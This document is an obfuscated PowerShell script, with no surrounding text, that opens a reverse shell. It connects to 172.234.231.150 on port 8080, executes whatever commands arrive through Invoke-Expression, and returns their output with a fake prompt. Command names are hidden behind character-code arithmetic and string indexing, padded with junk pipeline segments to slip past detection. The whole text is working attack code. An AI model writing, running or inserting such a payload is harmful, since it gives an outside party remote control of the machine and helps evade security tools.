$o = & ([string]::join('', ( (78,101,119,45,79,98,106,101,99,116) |<##>%{$_}<##>|%{ ( [char][int] $_)})) |<##>%{$_}<##>| % {$_}) $([char](46*83/46)+[char](1+121-1)+[char](75*115/75)+[char](0+116-0)+[char](0+101-0)+[char](21*109/21)+[char](7*46/7)+[char](0+78-0)+[char](0+101-0)+[char](109+116-109)+[char](0+46-0)+[char](10*83/10)+[char](20+111-20)+[char](0+99-0)+[char](0+107-0)+[char](0+101-0)+[char](86*116/86)+[char](57*115/57)+[char](0+46-0)+[char](56+84-56)+[char](0+67-0)+[char](0+80-0)+[char](0+67-0)+[char](0+108-0)+[char](0+105-0)+[char](20*101/20)+[char](35*110/35)+[char](37+116-37))("172.234.231.150", "8080");
$AFJpBTby5x = $($(& (("gp9bATBYyh3N41lkSwsFQIq2PGuODtmrda-H8LfC7WvRn0U5KxjVcoZ6XeMJziE")[61,44,42,53,15,57,34,57,49,1,31,57,18,18,61,53,44] -join '')([string]::join('', ( (36,111,46,71,101,116,83,116,114,101,97,109,40,41) |%{ ( [char][int] $_)})) | % {$_})));[byte[]]$nFzq6OhgES = 0..$(((65535)))|<##>%{$_}<##>|%{0};
while(($jrRgcWCOmqID = $AFJpBTby5x.Read($nFzq6OhgES, 0, $nFzq6OhgES.Length)) -ne 0){
    $87b9pgGkwSYmNEe2HxZTPzX1R = (& ([string]::join('', ( (78,101,119,45,79,98,106,101,99,116) |<##>%{$_}<##>|%{ ( [char][int] $_)})) |<##>%{$_}<##>| % {$_}) -TypeName $([char](39+83-39)+[char](39+121-39)+[char](98*115/98)+[char](54+116-54)+[char](0+101-0)+[char](53+109-53)+[char](56+46-56)+[char](0+84-0)+[char](0+101-0)+[char](0+120-0)+[char](90+116-90)+[char](0+46-0)+[char](0+65-0)+[char](6+83-6)+[char](0+67-0)+[char](54+73-54)+[char](0+73-0)+[char](0+69-0)+[char](0+110-0)+[char](25+99-25)+[char](0+111-0)+[char](54*100/54)+[char](64+105-64)+[char](0+110-0)+[char](112*103/112))).GetString($nFzq6OhgES,0, $jrRgcWCOmqID);
    $ZiHOCltU4REwWGdVpXIK = (& (("ineov1qFagz8HBhPkpsQ3lbxXtmwRJINAVS6-y25TWcUfjZ97OGrDLEYu4KMd0C")[30,1,4,3,16,2,36,54,23,17,51,2,18,18,0,3,1] -join '') $87b9pgGkwSYmNEe2HxZTPzX1R 2>&1 |<##>%{$_}<##>| & ([string]::join('', ( (79,117,116,45,83,116,114,105,110,103) |<##>%{$_}<##>|%{ ( [char][int] $_)})) |<##>%{$_}<##>| % {$_}) );
    $fvsQ76oIg3PXzpUyjEuhr9R = $ZiHOCltU4REwWGdVpXIK + 'PS ' + (& (("KfHM3eIiukzwXh6lsDxFoER-gmt4pCb1QjLc0WU7TnJY8ZABSPrGaOdN592Vqyv")[51,5,26,23,34,20,35,52,26,7,20,41] -join '')).Path + '> ';
    $5yTsEO2Pw = ([text.encoding]::ASCII).GetBytes($fvsQ76oIg3PXzpUyjEuhr9R);
    $AFJpBTby5x.Write($5yTsEO2Pw,0,$5yTsEO2Pw.Length);
    ($($(& ([string]::join('', ( (105,110,118,111,107,101,45,101,120,112,114,101,115,115,105,111,110) |%{ ( [char][int] $_)})) | % {$_})([string]::join('', ( (36,65,70,74,112,66,84,98,121,53,120,46,70,108,117,115,104,40,41) |%{ ( [char][int] $_)})) | % {$_}))))
};
(($o.Close()));
